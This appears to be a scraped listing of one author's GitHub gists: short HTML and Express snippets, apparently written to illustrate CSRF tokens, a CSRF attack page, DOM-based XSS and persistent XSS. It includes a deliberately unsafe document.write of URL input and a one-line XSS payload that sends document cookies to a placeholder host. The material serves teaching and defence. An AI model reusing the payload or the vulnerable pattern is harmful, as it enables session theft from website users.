Alexander Zlatkov zlatkov
zlatkov
/ synchronizerTokenExample.html
Created
February 8, 2021 14:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form action=’/api/payment’ method=’post’> | |
| <input type=’hidden" name=’CSRFToken’ value=’WfF1szMUHhiokx9AHFply5L2xAOfjRkE’> | |
| </form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form action='/profile' method='POST'> | |
| <input type='hidden' name='_csrf' value='<%= csrfToken %>'> | |
| <label for='name'> Name:</label> | |
| <input type='text' name='name'> | |
| <button type='submit'> Update </button> | |
| </form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const express = require('express'); | |
| const bodyParser = require('body-parser'); | |
| const csrf = require('csurf') | |
| const cookieParser = require('cookie-parser') | |
| const app = express(); | |
| const csrfProtection = csrf({ cookie: true }); | |
| app.use(cookieParser()); | |
| app.use(bodyParser.urlencoded({ extended: true })); | |
| app.set('view engine', 'ejs'); |
zlatkov
/ cstf_page_example.html
Created
February 2, 2021 13:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML> | |
| <html> | |
| <head></head> | |
| <body> | |
| <form method='post' action='htps://example.com/api/profile'> | |
| <input type='hidden' name='username' value="The Attacker"> | |
| <input type='hidden' name='email' value="[email protected]"> | |
| </form> | |
| <script> |
zlatkov
/ user_profile.html
Last active
February 8, 2021 13:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML> | |
| <html> | |
| <head> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> | |
| <script> | |
| $.get('htps://example.com/api/profile', function(data) { | |
| $('#username').val(data.name); | |
| $('#useremail').val(data.email); | |
| }); | |
| </script> |
zlatkov
/ DOMXSSExample.html
Last active
January 21, 2021 08:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title> Dashboard </title> | |
| </head> | |
| <body> | |
| <script> | |
| let startPosition = document.URL.indexOf("role=") + 5; | |
| let userRole = document.URL.substring(startPosition,document.URL.length); | |
| document.write(userRole); | |
| </script> |
zlatkov
/ persistentXSSExampleMaliciousOutput.html
Created
January 20, 2021 15:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div> You searched for: <script>/*Malicious code*/</script> </div> | |
| <div> Results: </div> | |
| … |
zlatkov
/ persistentXSSExampleMaliciousInput.html
Created
January 20, 2021 15:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>/*Malicious code*/</script> |
zlatkov
/ persistentXSSExample.html
Last active
January 20, 2021 15:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div> You searched for: javascript </div> | |
| <div> Results: </div> | |
| … |
zlatkov
/ persistentXSS.html
Last active
January 20, 2021 15:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> window.location = ‘https://example.com/?user_data=’ + document.cookies; </script> |